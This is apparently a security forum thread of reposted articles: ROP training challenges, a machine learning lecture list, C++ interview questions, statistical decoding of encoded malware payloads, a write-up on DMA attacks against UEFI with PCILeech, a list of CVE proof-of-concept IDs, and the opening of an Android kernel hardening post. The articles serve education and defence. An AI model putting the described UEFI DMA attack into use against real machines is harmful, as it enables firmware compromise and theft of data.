  16. ROP Emporium Learn return-oriented programming through a series of challenges designed to teach ROP techniques in isolation, with minimal reverse-engineering and bug-hunting. Beginner's Guide All Challenges ret2win ret2win means 'return here to win' and it's recommended you start with this challenge. Visit the challenge page by clicking the link above to learn more. split Combine elements from the ret2win challenge that have been split apart to beat this challenge. Learn how to use another tool whislt crafting a short ROP chain. callme Chain calls to multiple imported methods with specific arguments and see how the differences between 64 & 32 bit calling conventions affect your ROP chain. write4 Find and manipulate gadgets to construct an arbitrary write primitive and use it to learn where and how to get your data into process memory. badchars Learn to deal with badchars, characters that will not make it into process memory intact or cause other issues such as premature chain termination. fluff Sort the useful gadgets from the fluff to construct another write primitive in this challenge. You'll have to get creative though, the gadgets aren't straight forward. pivot Stack space is at a premium in this challenge and you'll have to pivot the stack onto a second ROP chain elsewhere in memory to ensure your success. Sursa: https://ropemporium.com/
      • 1
      • Thanks
  17. CEH, CISSP?
  18. Deep Learning (DLSS) and Reinforcement Learning (RLSS) Summer School, Montreal 2017 Deep neural networks that learn to represent data in multiple layers of increasing abstraction have dramatically improved the state-of-the-art for speech recognition, object recognition, object detection, predicting the activity of drug molecules, and many other tasks. Deep learning discovers intricate structure in large datasets by building distributed representations, either via supervised, unsupervised or reinforcement learning. The Deep Learning Summer School (DLSS) is aimed at graduate students and industrial engineers and researchers who already have some basic knowledge of machine learning (and possibly but not necessarily of deep learning) and wish to learn more about this rapidly growing field of research. In collaboration with DLSS we will hold the first edition of the Montreal Reinforcement Learning Summer School (RLSS). RLSS will cover the basics of reinforcement learning and show its most recent research trends and discoveries, as well as present an opportunity to interact with graduate students and senior researchers in the field. The school is intended for graduate students in Machine Learning and related fields. Participants should have advanced prior training in computer science and mathematics, and preference will be given to students from research labs affiliated with the CIFAR program on Learning in Machines and Brains. Deep Learning Summer School [syn] 630 views, 1:26:30 Machine Learning Doina Precup [syn] 223 views, 3:03:15 Neural Networks Hugo Larochelle [syn] 320 views, 1:25:47 Recurrent Neural Networks (RNNs) Yoshua Bengio [syn] 81 views, 1:30:25 Probabilistic numerics for deep learning Michael Osborne [syn] 211 views, 1:18:03 Generative Models I Ian Goodfellow 34 views, 34:51 Theano Pascal Lamblin [syn] 42 views, 1:05:58 AI Impact on Jobs Michael Osborne [syn] 71 views, 1:28:54 Introduction to CNNs Richard Zemel 1:28:22 Structured Models/Advanced Vision Raquel Urtasun [syn] 177 views, 55:15 Torch/PyTorch Soumith Chintala [syn] 48 views, 1:28:25 Generative Models II Aaron Courville [syn] 81 views, 1:24:30 Natural Language Understanding Phil Blunsom [syn] 40 views, 1:23:42 Natural Language Processing Phil Blunsom 62 views, 15:25 Bayesian Hyper Networks David Scott Krueger 14:01 Gibs Net Alex Lamb 196 views, 12:23 Pixel GAN autoencoder Alireza Makhzani 48 views, 16:16 CRNN's Rémi Leblond, Jean-Baptiste Alayrac [syn] 94 views, 1:23:34 Deep learning in the brain Blake Aaron Richards [syn] 70 views, 1:32:38 Theoretical Neuroscience and Deep Learning Theory Surya Ganguli [syn] 108 views, 1:23:14 Marrying Graphical Models & Deep Learning Max Welling 127 views, 1:21:05 Learning to Learn Nando de Freitas [syn] 36 views, 1:18:12 Automatic Differentiation Matthew James Johnson [syn] 54 views, 1:30:25 Combining Graphical Models and Deep Learning Matthew James Johnson 24 views, 12:52 Domain Randomization for Cuboid Pose Estimation Jonathan Tremblay 21 views, 15:48 tbd Rogers F. Silva 106 views, 16:26 What Would Shannon Do? Bayesian Compression for DL Karen Ullrich 21 views, 13:13 On the Expressive Efficiency of Overlapping Architectures of Deep Learning Or Sharir Reinforcement Learning Summer School 185 views, 1:29:32 Reinforcement Learning Joelle Pineau 84 views, 1:28:26 Policy Search for RL Pieter Abbeel 122 views, 1:26:24 TD Learning Richard S. Sutton 55 views, 1:21:20 Deep Reinforcement Learning Hado van Hasselt 79 views, 1:23:52 Deep Control Nando de Freitas 47 views, 1:23:58 Theory of RL Csaba Szepesvári [syn] 35 views, 1:29:02 Reinforcement Learning Satinder Singh 25 views, 1:21:44 Safe RL Philip S. Thomas 35 views, 43:54 Applications of bandits and recommendation systems Nicolas Le Roux 71 views, 1:02:35 Cooperative Visual Dialogue with Deep RL Devi Parikh, Dhruv Batra Sursa: http://videolectures.net/deeplearning2017_montreal/
  19. 10 Proven C++ Programming Questions to Ask on Interview May 25, 2017 Programming Interview Questions 2 Comments Need to hire C++ developers? Not confident you have the resources to pick the best ones? Don’t worry – we’re here to help you! We’ve assembled a team of expert C++ programmers who have worked hard to produce a collection of premade C++ interview questions you can use to bolster your interview process. These C++ programming questions are your secret weapon for face-to-face interviews with prospective hires: answers, explanations, follow-up questions, code snippets. Even if you’re not a C++ guru yourself, these questions will let you conduct an interview like one, helping you find the master developers your project demands! So here are the questions and answers: [Question #1 – std::unique_ptr – Standard library] [Question #2 – Rule of Five – RAII] [Question #3 – Finding bugs – Basics] [Question #4 – Automatic objects – RAII] [Question #5 – Iterators – Standard library] [Question #6 – Undefined/unspecified behaviour – Standards] [Question #7 – Macros – Preprocessor] [Question #8 – Pointer detector – Templates] [Question #9 – Insertion sort – Templates] [Question #10 – Max heap – Algorithms and data structures] [BONUS – C++ Online Test] [Question #1 – std::unique_ptr – Standard library] What happens when a std::unique_ptr is passed by value to a function? For example, in this code snippet? #include <memory> auto f(std::unique_ptr<int> ptr) { *ptr = 42; return ptr; } int main() { auto ptr = std::make_unique<int>(); ptr = f(ptr); } Why this C++ question? As mentioned before, memory management is a nontrivial burden for the C++ programmer. Smart pointers are helpful in this regard, but they must be well understood in order to be used correctly. This question tests for the interview candidate’s understanding of one common type of smart pointer. Possible answers The correct answer is that this code won’t even compile. The std::unique_ptr type cannot be copied, so passing it as a parameter to a function will fail to compile. To convince the compiler that this is fine, std::move can be used: ptr = f(std::move(ptr)); Follow-up questions The interview candidate might think that returning a noncopiable object from a function is also a compiler error, but in this case it’s allowed, thanks to copy elision. You can ask the candidate under what conditions copy elision is performed. Of course, the above construct with std::move is less than ideal. Ask the candidate how they would change the function f to make it better. For example, passing a (const) reference to the unique_ptr, or simply a reference to the int pointed to, is probably preferred. ↑↑ Scroll up to the list of C++ questions [Question #2 – Rule of Five – RAII] Write a copy constructor, move constructor, copy assignment operator, and move assignment operator for the following class (assume all required headers are already included): class DirectorySearchResult { public: DirectorySearchResult( std::vector<std::string> const& files, size_t attributes, SearchQuery const* query) : files(files), attributes(attributes), query(new SearchQuery(*query)) { } ~DirectorySearchResult() { delete query; } private: std::vector<std::string> files; size_t attributes; SearchQuery* query; }; Why this interview question? Writing boilerplate like this should be straightforward for any C++ programmer. It is also interesting to see the interview candidate’s response to the class design, and see if they question it at all. Possible answers Copy constructor: DirectorySearchResult(DirectorySearchResult const& other) : files(other.files), attributes(other.attributes), query(other.query ? new SearchQuery(*other.query) : nullptr) { } Here, it’s the check for null pointer to watch out for. As given, the query field cannot be null, but since it’s not const this may change later. Move constructor: DirectorySearchResult(DirectorySearchResult&& other) : files(std::move(other.files)), attributes(other.attributes), query(other.query) { other.query = nullptr; } Watch out for correct usage of std::move here, as well as correct “pointer stealing” for the query pointer. It must be nulled, otherwise the object will be deleted by other. Assignment operator: DirectorySearchResult& operator=(DirectorySearchResult const& other) { if (this == &other) return *this; files = other.files; attributes = other.attributes; delete query; query = other.query ? new SearchQuery(*other.query) : nullptr; return *this; } A pitfall is forgetting to check for self-assignment. It’s also worth looking out for a correct function signature, and again handling a null query. Move assignment operator: DirectorySearchResult& operator=(DirectorySearchResult&& other) { files = std::move(other.files); attributes = other.attributes; std::swap(query, other.query); return *this; } As with the move constructor, watch out for correct std::move usage and correct pointer stealing. Follow-up questions If the interview candidate hasn’t mentioned it already, ask them how the design of this class could be improved. There is no reason for SearchQuery to be a pointer! If we make it a simple object (composition), the default, compiler-generated versions of all four functions would suffice, and the destructor can be removed as well. ↑↑ Scroll up to the list of C++ questions [Question #3 – Finding bugs – Basics] There are multiple issues/bugs with the following code. Name as many as you can! #include <vector.h> void main(int argc, char** argv) { int n; if (argc > 1) n = argv[0]; int* stuff = new int[n]; vector<int> v(100000); delete stuff; return 0; } Why this programming question? In any programming language, debugging is an essential skill; C++ is no exception. Being able to debug a program on paper, without looking at its actual runtime behavior, is a useful skill, because the ability to spot incorrect code helps the programmer avoid those mistakes in their own code. Also, it’s just plain fun to pick someone else’s code apart like that, so this serves as a good warm-up question to put interview candidates at ease. Possible answers vector.h should be vector main cannot be void in C++ argv[0] is the program name, not the first argument argv[0] is a pointer to a string, and should not be assigned to n directly If argc <= 1, then n is uninitialized, and using it invokes undefined behavior vector is used without using namespace std or std:: the vector constructor might throw an exception (std::bad_alloc), causing stuff to be leaked stuff points to an array, so it should be deleted using delete[] cannot return 0 from a void function Follow-up questions For each issue the candidate identifies, ask how it can best be fixed. They should at least mention using a smart pointer or std::vector instead of a raw pointer for stuff. 10 Proven C++ Programming Questions to Ask on Interview (Explanations, Possible Answers, Following Questions)Click To Tweet ↑↑ Scroll up to the list of C++ questions [Question #4 – Automatic objects – RAII] Explain what an automatic object is (that is, an object with automatic storage duration; also called “Stack object”) and what its lifetime is. Explain how an object with dynamic storage duration (heap object) is created, and how it is destroyed. Why is dynamic storage duration discouraged unless necessary, and where is it necessary? What is the inherent problem with raw pointers owning an object? I.e. why is the following considered bad practice, and what standard library construct would you utilize if you needed a dynamically resizable array? auto p = new int[50]; Show how to initialize a smart pointer, and explain why using one is exception safe. Why this C++ interview question? Unlike garbage-collected languages, C++ puts the burden of managing object lifetimes (and thereby memory) on the programmer. There are many ways to do this wrong, some ways to do it approximately right, and few ways to do it entirely “by the book”. This series of questions drills the interview candidate about these matters. Possible answers A stack object is created at the point of its definition, and lives until the end of its scope (basically, until the closing curly brace of the block it is declared in). A heap object is created with the new operator and lives until delete is called on it. The problem with raw pointers is that ownership is not enforced; it is the responsibility of the programmer to ensure that the object pointed to is deleted, and deleted only once. Advanced candidates might also mention exception safety here, because the possibility of exceptions makes it significantly more complicated to ensure eventual deletion. Unlike its precursor C, C++ offers smart pointers, which are the preferred tool for the job. In particular, to create a “smart pointer” to a dynamically resizable array, std::vectorshould be used. An example of smart pointer usage: auto p = std::make_unique<Foo>(); Follow-up questions Ask the candidate which types of smart pointer exist in the C++ standard library, and what their differences are. Ask which ones can be used in standard containers (e.g. vector, map). You can also ask about the difference between std::make_shared<T>(…) and std::shared_ptr<T>(new T(…)). (The former is more exception-safe when used as a function argument, and might also be implemented more efficiently.) ↑↑ Scroll up to the list of C++ questions [Question #5 – Iterators – Standard library] The C++ standard library represents ranges using iterators. What is an iterator, and what different kinds do you know of? Can you explain why the following snippet fails, and why l’s iterators aren’t suitable? std::list<int> l {1, 2, 3}; std::sort(l.begin(), l.end()); Explain how the begin and end iterators of a range correspond to its elements and illustrate this by giving the expressions for begin and end iterators of an array arr. Why this question? Standard library containers are the bread and butter of writing algorithms in C++. As in any programming language, one of the most common tasks to perform on a container is to iterate over it. In the C++ standard library, this is accomplished using special-purpose, pointer-like objects called iterators, which come in different types. Asking the candidate about these will reveal how well they understand the concept of iterators, as well as the structure of the underlying container. Possible answers An iterator resembles a smart pointer, in the sense that it points to a particular object in a container. But iterators have additional operations besides deferencing, depending on their type: forward iterators can be incremented, bidirectional iterators can additionally be decremented, and random access iterators can additionally be moved by an arbitrary offset. There are also output iterators, which may for example add objects to the container when assigned to. The reason that the sort call won’t work is that it requires a random access iterator, but std::list only provides a bidirectional iterator. By convention, the begin iterator of a collection refers to the first element, and the enditerator refers one past the last element. In other words, they form a half-open range: [begin, end). Follow-up questions Ask how the code could be fixed to sort an std::list (e.g. by copying it into a vector first, and back again after sorting). You could even ask the candidate to implement an iterator for a particular data structure (e.g. an array). ↑↑ Scroll up to the list of C++ questions [Question #6 – Undefined/unspecified behavior – Standards] Describe what “undefined behavior” means, and how it differs from “unspecified behavior”. Give at least 3 examples of undefined behavior. Why this C++ question? The C++ standard does not specify the behavior of the program in every case, and deliberately leaves some things up to compiler vendors. Typically, such cases are to be avoided in practice, so this question is to test whether the interview candidate has seen practical examples of such code. Possible answers Undefined behavior (UB) means that the standard guarantees nothing about how the program should behave. Unspecified (or implementation-defined) behavior means that the standard requires the behavior to be well-defined, but leaves the definition up to the compiler implementation. This is only the textbook definition; candidates should mention that undefined behavior implies that anything might happen: the program works as intended, it crashes, it causes demons to fly out of your nose. They should mention that UB should always be avoided. They might mention that implementation-defined behavior should probably be avoided as well. Common examples of undefined behavior include: dereferencing a null or wild pointer accessing uninitialized memory, like going beyond the bounds of an array or reading an uninitialized local variable deleting the same memory twice, or more generally deleting a wild pointer arithmetic errors, like division by zero Follow-up questions If the candidate doesn’t come up with enough UB cases, you can make up some cases of dodgy-looking code and ask them whether it exhibits UB or not. ↑↑ Scroll up to the list of C++ questions [Question #7 – Macros – Preprocessor] At what stage of compilation is the preprocessor invoked, and what kind of directives are there? The following is the declaration of a macro that is used as a constant in some internal API header (B is another entity): #define A 2048*B List two issues with this macro: one related to this particular one, for which you should give illustrative example code that breaks the macro, and one related to all macros (hint: think of names). Why this question? Even though the preprocessor is typically used in C++ for just a few specific tasks, it is still important to have a basic understanding of its operation and its limitations. The preprocessor makes it very easy to shoot yourself in the foot, so “responsible usage” is essential. As stated, this looks like more of a trivia than a discussion question, and it’s up to the interviewer to dig deeper where necessary. Possible answers The preprocessor is invoked on a translation unit (“source file”) before actual compilation starts. The output of the preprocessor is passed to the compiler. Even junior candidates should give an answer along these lines. Common preprocessor directives are #include, #define, #ifdef, #ifndef, #if, #else, #elif, #endif. Candidates should be able to list most of these. They might also mention less common directives, such as #undef and #pragma. The two problems with the #define code are: Lack of parentheses, in two places. If B is defined as 1+1, then A will not have the value 4096 as expected, but rather 2049. If A is used in an expression like !A, this will expand to ~2048*B, rather than ~(2048*B), which may have a very different value. The macro should have been defined as: #define A (2048*(B)) Good candidates will mention that this should probably not have been a macro in the first place, but simply a compile-time constant. Overly short names. Preprocessor macros are all in a single scope, which spans all files #included afterwards as well, so one has to be very careful about name clashes. If some unrelated code declared an enum { A, B }, for example, that code would fail to compile with a very confusing error message. Follow-up questions It is common for candidates to mention only one of the two pairs of missing parentheses. In this case, prompt them to find more issues. This can also lead to a discussion about why the preprocessor should be avoided when possible, and what the C++ style alternatives are. ↑↑ Scroll up to the list of C++ questions [Question #8 – Pointer detector – Templates] Write a templated struct that determines, at compile time, whether its template argument T is a pointer. Why this C++ programming question? Template metaprogramming in C++ is an advanced topic, so this question is one of the c++ interview questions for experienced professionals and should not be posed to junior interview candidates. However, for senior candidates, this question can be a good indicator of the depth of their practical experience with the C++ language. Possible answers The candidate might mention that std::is_pointer already exists. It could be implemented like this: template<typename T> struct is_pointer { enum { value = false; }; }; template<typename T> struct is_pointer<T*> { enum { value = true; }; } Template overload resolution will pick the most specific version, so if the type is a pointer, the last one will be selected, which contains an enum field value with the value true. Otherwise it falls back to the first, where value is false. It is also possible to use a static const bool instead of an enum, but this has some drawbacks. The constants would still occupy memory space, so it’s not a 100% compile-time construct anymore. Moreover, you’d need to redefine the existence of value outside the template in order for it to exist, because the assignment of a value in this case does not make it into an actual definition. It would work in some cases, but would fail if you take the address, for example. Follow-up questions If the candidate doesn’t offer an explanation of their code, ask them for it. You can also ask them about what “most specific” means, i.e. how template overload resolution actually works. Please note one more time that this question is one of the advanced c++ interview questions. ↑↑ Scroll up to the list of C++ questions [Question #9 – Insertion sort – Templates] Define a function insertion_sort which accepts as first and only argument a reference to an std::array only if the element types are integral (the trait std::is_integral might be of help) and the size of the array is less than 128 elements, and sorts it using insertion sort. Why this C++ technical interview question? This tests for the candidate’s knowledge of std::enable_if, a compile-time construct which lets the C++ programmer put additional restrictions on the types that their template accepts. This is an advanced skill, useful when writing library code, for example to avoid incorrect or inefficient usage of the API. The interesting part here is the function signature, but the candidate’s ability to implement an insertion sort is also tested. It’s up to the interviewer how much emphasis to put on either of these parts. Possible answers A possible implementation: template<typename T, std::size_t N> typename std::enable_if< N < 128 && std::is_integral<T>::value, void >::type insertion_sort(std::array<T, N>& array) { for (std::size_t i = 0; i < N; i++) { for (std::size_t j = i; j > 0 && array[j] < array[j-1]; j--) { std::swap(array[j], array[j - 1]); } } } Do not punish the candidate for not knowing the exact usage of all these standard library templates. The important thing is that they grasp the overall concepts; the details can be looked up online easily enough. Follow-up questions If you haven’t asked the “pointer detector” question, you could ask the candidate here how they would implement std::enable_if and/or std::is_integral. ↑↑ Scroll up to the list of C++ questions [Question #10 – Max heap – Algorithms and data structures] Describe what a max heap is. Provide the definition of a max heap class which supports a wide range of element types and all basic operations that can be performed on a heap. Why this question? At first, this seems like a pure algorithms question, but note that we are not asking for the implementation of any of the operations. This question purely tests the candidate’s ability to design a proper C++ class. Possible answers Depending on the design decisions that the interview candidate makes along the way, the result could be something like this: template<typename T> class heap { public: void add(T const &value); T const &max() const; T remove_max(); size_t size() const; private: std::vector<T> elements; }; Look out for the following: Are the class and its operations being named consistently and intuitively? What type is being used for the internal container? std::vector is preferred, but other possibilities exist. Use of a raw pointer to an array is a red flag, because it will make the class needlessly hard to implement. What is the argument type of the add function? This should be a pointer or reference type in order to avoid needless copying. An overload that takes an rvalue reference is a bonus. What is the return value of the max and remove_max functions? Are functions marked as const where possible? Are noexcept clauses used as appropriate? Follow-up questions Many design decisions can be made along the way, each of which can be used by the interviewer as a hook to lead into further discussion about the various tradeoffs in the design. ↑↑ Scroll up to the list of C++ questions [C++ Interview Test] Prefer a more hands-off approach to selecting candidates? No problem: just use our automated multiple-choice questions C++ test instead. Just send prospective developers their own unique custom link, and you’ll automatically receive an email notification if they pass. You can make your candidate selection process even more efficient with a mix-and-match approach: use our 20-question quiz to find the top candidates, and then bring them in for an interview using our premade questions. You can save time and effort by weeding out the majority of candidates before you ever see them in person! ↑↑ Scroll up to the list of C++ questions Conclusion It remains a tricky business to assess an interview candidate’s worth within the space of an hour, or even two. Using a set of well-tested c++ programming interview questionslike the above, and calibrating them by using them on many different candidates, will help you take some of the noise out of the equation to get a better signal on the candidate’s abilities. This, in turn, will result in better hiring decisions, a stronger team, and eventually a better-functioning organization. ↑↑ Scroll up to the list of C++ questions Authors These C++ technical interview questions have been created by this team of C++ professionals: Thomas ten Cate, Ex-Googler Agustín Bergé Thomas Pigarelli Robert Haberlach Cameron Desrochers Michele Caini Sursa: https://tests4geeks.com/cpp-interview-questions/
      • 2
      • Upvote
  20. Decoding malware via simple statistical analysis Leave a reply Intro Analyzing malware often requires code reverse engineering which can scare people away from malware analysis. Executables are often encoded to avoid detection. For example, many malicious Word documents have an embedded executable payload that is base64 encoded (or some other encoding). To understand the encoding, and be able to decode the payload for further analysis, reversing of the macro code is often performed. But code reversing is not the only possible solution. Here we will describe a statistical analysis method that can be applied to certain malware families, such as the Hancitor malicious documents. We will present this method step by step. Examples First we start with a Windows executable (PE file) that is BASE64 encoded. In BASE64 encoding, 64 different characters are used to encode bytes. 64 is 6 bits, hence there is an overhead when encoding in BASE64, as encoding one byte (8 bits) will require 2 BASE64 characters (6 bits + 2 bits). With byte-stats.py, we can generate statistics for the different byte values found in a file. When we use this to analyze our BASE64 encoded executable, we get this output: In the screenshot above see that we have 64 different byte values, and that 100% of the byte values are BASE64 characters. This is a strong indication that the data in file base64.txt is indeed BASE64 encoded. Using the option -r of byte-stats.py, we are presented with an overview of the ranges of byte values found in the file: The identified ranges /0123456789, ABCDEFGHIJKLMNOPQRSTUVWXYZ and abcdefghijklmnopqrstuvwxyz (and single charcter +) confirm that this is indeed BASE64 data. Padded BASE64 data would include one or two padding characters at the end (the padding character is =). Decoding this file with base64dump.py (a BASE64 decoding tool), confirms that it is a PE file (cfr. MZ header) that is BASE64 encoded. Now, sometimes the encoding is a bit more complex than just BASE64 encoding. Let’s take a look at another sample: The range of lowercase letters, for example, starts with d (in stead of a) and ends with } (in stead of z). We observer a similar change for the other ranges. It looks like all BASE64 characters have been shifted 3 positions to the right. We can test this hypothesis by subtracting 3 from every byte value (that’s shifting 3 positions to the left) and analyzing the result. To subtract 3 from every byte, we use program translate.py. translate.py takes a file as input and an arithmetic operation: operation “byte – 3” will subtract 3 from every byte value. This is the result we get when we perform a statistical analysis of the byte values shifted 3 positions to the left: In the screenshot above we see 64 unique bytes and all bytes are BASE64 characters. When we try to decode this with base64dump, we can indeed recover the executable: Let’s move on to another example. Malicious documents that deliver Hancitor malware use an encoding that is a bit more complex: This time, we have 68 unique byte values, and the ranges are shifted by 3 positions when we look at the left of a range, but they appear to be shifted by 4 positions when we look at the right of a range. How can this be explained? One hypothesis, is that the malware is encoded by shifting some of the bytes with 3 positions, and the other bytes with 4 positions. A simple method is to alternate this shift: the first byte is shifted by 3 positions, the second by 4 positions, the third again by 3 positions, the fourth by 4 positions, and so on … Let’s try out this hypothesis, by using translate.py to shift by 3 or 4 positions depending on the position: Variable position is an integer that gives the position of the byte (starts with 0), and position % 2 is the remainder of dividing position by 2. Expression position % 2 == 0 is True for even positions, and False for uneven positions. IFF is the IF Function: if argument 1 is true, it returns argument 2, otherwise it returns argument 3. This is how we can shift our input alternating with 3 and 4. But as you can see, the result is certainly not BASE64, so our hypothesis is wrong. Let’s try with shifting by 4 and 3 (instead of 3 and 4): This time we get the ranges for BASE64. Testing with base64dump.py confirms our hypothesis: Conclusion Malware authors use encoding schemes that can be reverse engineered by statistical analysis and testing simple hypotheses. Sometimes a bit of trial and error is needed, but these encoding schemes can be simple enough to decode without having to perform reverse engineering of code. This entry was posted in malware on August 30, 2017 by didiernviso. Sursa: https://blog.nviso.be/2017/08/30/decoding-malware-via-simple-statistical-analysis/
      • 1
      • Upvote
  21. Wednesday, August 30, 2017 Attacking UEFI Unlike macs many PCs are likely to be vulnerable to pre-boot Direct Memory Access (DMA) attacks against UEFI. If an attack is successful on a system configured with secure boot - then the chain of trust is broken and secure boot becomes insecure boot. If code execution is gained before the operating system is started further compromise of the not yet loaded operating system may be possible. As an example it may be possible to compromise a Windows 10 system running Virtualization Based Security (VBS) with Device Guard. This have already been researched by Dmytro Oleksiuk. This post will focus on attacking UEFI over DMA and not potential further compromises of the system. What is UEFI? UEFI is short for Unified Extensible Firmware Interface. It is the firmware that is running on the computer before the operating system is booted. UEFI is responsible for detecting memory, disks and other hardware required to boot the operating system. UEFI is a small operating system in itself. It's also sometimes a bit sloppily called the BIOS. The Targets A brand new Intel NUC i3 "Kaby Lake" purchased in June. 8GB RAM, Win10 1703 with Secure Boot, Bitlocker+TPM, Virtualization Based Security (VBS) Device Guard is enabled. BIOS revision: BNKBL357.86A.0036.2017.0105.1112. DMA access via internal M.2 slot. An older Lenovo T430, 8GB RAM, Win10 1703 with Secure Boot, Bitlocker+TPM, Virtualization Based Security (VBS) Device Guard is enabled. DMA access via ExpressCard slot. T430 to the left, NUC to the right. The Problem The root problem is that many UEFIs still do not protect themselves against DMA attacks, despite the hardware (VT-d/IOMMU) to do so being included in all CPUs for many years. The screenshot below shows PCILeech first searching the memory of a target computer over DMA trying to find where to hook into UEFI. Once inside it's easy to dump memory (also shown) and do other evilness - such as executing arbitrary code despite secure boot being enabled. Loading a PCILeech module into UEFI, dumping the memory and unloading the module. The Attack Taking control is a simple matter of finding the correct memory structures and overwriting them if DMA access is allowed. This process is automated with PCILeech. It's possible to automatically search for the memory address of the EFI system table "IBI SYST" - or even better specify it directly to PCILeech. The EFI System Table contains the location of the EFI boot services table "BOOTSERV" which contains many useful function pointers. The boot services functions are useful for both hooking and also calling into from our implanted module. In the example below the boot services function SignalEvent() is hooked. Once the PCILeech "kernel" module for UEFI is inserted it's possible to use it to dump memory and execute code - just as any normal PCILeech kernel module. In the example below the PCILeech UEFI implant uefi_textout is called multiple times. The output is printed on the screen of the victim computer. The text HELLO FROM EVIL PCILEECH IMPLANT !!! is printed multiple times after the PCILeech module for UEFI have been inserted. Once the attack was completed the kmdexit command was issued to PCILeech and the UEFI implant was unloaded. In this case Windows will start booting as shown below. If targeting the operating system loaded it's better to hook ExitBootServices() - which is called by the EFI based operating system loader when the operating system is taking over control of the computer from UEFI. At this point in time it will be possible for malicious code to modify the operating system loader. Windows is booting normally once the PCILeech UEFI module is unloaded. Can I try it myself? Absolutely! The code is available as a part of the open source PCILeech Direct Memory Access Attack Toolkit on Github. Conclusions UEFI DMA attacking with PCILeech is now public, inexpensive and easy to perform. DMA attacks agaunst UEFI are no longer theoretical. Vendors should enable VT-d to protect against DMA attacks. Further compromise of the operating system may be possible. It may not be possible to rely on Virtualization Based Security if having a vulnerable UEFI. Posted by Ulf Frisk at 10:53 AM Sursa: http://blog.frizk.net/2017/08/attacking-uefi.html
  22. Awesome CVE PoC ✍️ A curated list of CVE PoCs. Here is a collection about Proof of Concepts of Common Vulnerabilities and Exposures, and you might also want to check out awesome-web-security. Please read the contribution guidelines before contributing. 🌈 This repo is full of PoCs for CVEs. Check out my repos 🐾 or say hi on my Twitter. Contents CVE-2013-6632 CVE-2014-1705 CVE-2014-3176 CVE-2014-6332 CVE-2014-7927 CVE-2014-7928 CVE-2015-0235 CVE-2015-0240 CVE-2015-1233 CVE-2015-1242 CVE-2015-1635 CVE-2015-3306 CVE-2015-5531 CVE-2015-6086 CVE-2015-6764 CVE-2015-6771 CVE-2015-7450 CVE-2015-7545 CVE-2015-8584 CVE-2016-0450 CVE-2016-0451 CVE-2016-0728 CVE-2016-1646 CVE-2016-1653 CVE-2016-1665 CVE-2016-1669 CVE-2016-1677 CVE-2016-1688 CVE-2016-1857 CVE-2016-2384 CVE-2016-3087 CVE-2016-3088 CVE-2016-3309 CVE-2016-3371 CVE-2016-3386 CVE-2016-4338 CVE-2016-4622 CVE-2016-4734 CVE-2016-4971 CVE-2016-5129 CVE-2016-5172 CVE-2016-5198 CVE-2016-5200 CVE-2016-5734 CVE-2016-6210 CVE-2016-6277 CVE-2016-6415 CVE-2016-7124 CVE-2016-7189 CVE-2016-7190 CVE-2016-7194 CVE-2016-7200 CVE-2016-7201 CVE-2016-7202 CVE-2016-7203 CVE-2016-7240 CVE-2016-7241 CVE-2016-7255 CVE-2016-7286 CVE-2016-7287 CVE-2016-7288 CVE-2016-7547 CVE-2016-7552 CVE-2016-8413 CVE-2016-8477 CVE-2016-8584 CVE-2016-8585 CVE-2016-8586 CVE-2016-8587 CVE-2016-8588 CVE-2016-8589 CVE-2016-8590 CVE-2016-8591 CVE-2016-8592 CVE-2016-8593 CVE-2016-9651 CVE-2016-9793 CVE-2016-10033 CVE-2016-10277 CVE-2016-10370 CVE-2017-0015 CVE-2017-0037 CVE-2017-0059 CVE-2017-0070 CVE-2017-0071 CVE-2017-0134 CVE-2017-0141 CVE-2017-0143 CVE-2017-0144 CVE-2017-0145 CVE-2017-0146 CVE-2017-0147 CVE-2017-0148 CVE-2017-0199 CVE-2017-0213 CVE-2017-0283 CVE-2017-0290 CVE-2017-0392 CVE-2017-0521 CVE-2017-0531 CVE-2017-0541 CVE-2017-0576 CVE-2017-1082 CVE-2017-1083 CVE-2017-1084 CVE-2017-1085 CVE-2017-2416 CVE-2017-2446 CVE-2017-2447 CVE-2017-2464 CVE-2017-2491 CVE-2017-2521 CVE-2017-2531 CVE-2017-2536 CVE-2017-2547 CVE-2017-2636 CVE-2017-3599 CVE-2017-3629 CVE-2017-3630 CVE-2017-3631 CVE-2017-4901 CVE-2017-4914 CVE-2017-4918 CVE-2017-4971 CVE-2017-5030 CVE-2017-5040 CVE-2017-5053 CVE-2017-5071 CVE-2017-5135 CVE-2017-5622 CVE-2017-5624 CVE-2017-5626 CVE-2017-5638 CVE-2017-5689 CVE-2017-5891 CVE-2017-5892 CVE-2017-5948 CVE-2017-6074 CVE-2017-6178 CVE-2017-6326 CVE-2017-6980 CVE-2017-6984 CVE-2017-7219 CVE-2017-7269 CVE-2017-7279 CVE-2017-7280 CVE-2017-7281 CVE-2017-7281 CVE-2017-7281 CVE-2017-7293 CVE-2017-7308 CVE-2017-7442 CVE-2017-7494 CVE-2017-7529 CVE-2017-8295 CVE-2017-8386 CVE-2017-8464 CVE-2017-8514 CVE-2017-8543 CVE-2017-8850 CVE-2017-8851 CVE-2017-8877 CVE-2017-8878 CVE-2017-8917 CVE-2017-9417 CVE-2017-9791 CVE-2017-9993 CVE-2017-10661 CVE-2017-11105 CVE-2017-11421 CVE-2017-1000112 CVE-2017-1000117 CVE-2017-1000353 CVE-2017-1000364 CVE-2017-1000365 CVE-2017-1000366 CVE-2017-1000367 CVE-2017-1000369 CVE-2017-1000370 CVE-2017-1000371 CVE-2017-1000372 CVE-2017-1000373 CVE-2017-1000374 CVE-2017-1000375 CVE-2017-1000376 CVE-2017-1000377 CVE-2017-1000378 CVE-2017-1000379 More information: https://github.com/qazbnm456/awesome-cve-poc
      • 2
      • Upvote
  23. Hardening the Kernel in Android Oreo 30 August 2017 Posted by Sami Tolvanen, Senior Software Engineer, Android Security The hardening of Android's userspace has increasingly made the underlying Linux kernel a more attractive target to attackers. As a result, more than a third of Android security bugs were found in the kernel last year. In Android 8.0 (Oreo), significant effort has gone into hardening the kernel to reduce the number and impact of security bugs. Android Nougat worked to protect the kernel by isolating it from userspace processes with the addition of SELinux ioctl filtering and requiring seccomp-bpf support, which allows apps to filter access to available system calls when processing untrusted input. Android 8.0 focuses on kernel self-protection with four security-hardening features backported from upstream Linux to all Android kernels supported in devices that first ship with this release. Hardened usercopy Usercopy functions are used by the kernel to transfer data from user space to kernel space memory and back again. Since 2014, missing or invalid bounds checking has caused about 45% of Android's kernel vulnerabilities. Hardened usercopy adds bounds checking to usercopy functions, which helps developers spot misuse and fix bugs in their code. Also, if obscure driver bugs slip through, hardening these functions prevents the exploitation of such bugs. This feature was introduced in the upstream kernel version 4.8, and we have backported it to Android kernels 3.18 and above. int buggy_driver_function(void __user *src, size_t size) { /* potential size_t overflow (don’t do this) */ u8 *buf = kmalloc(size 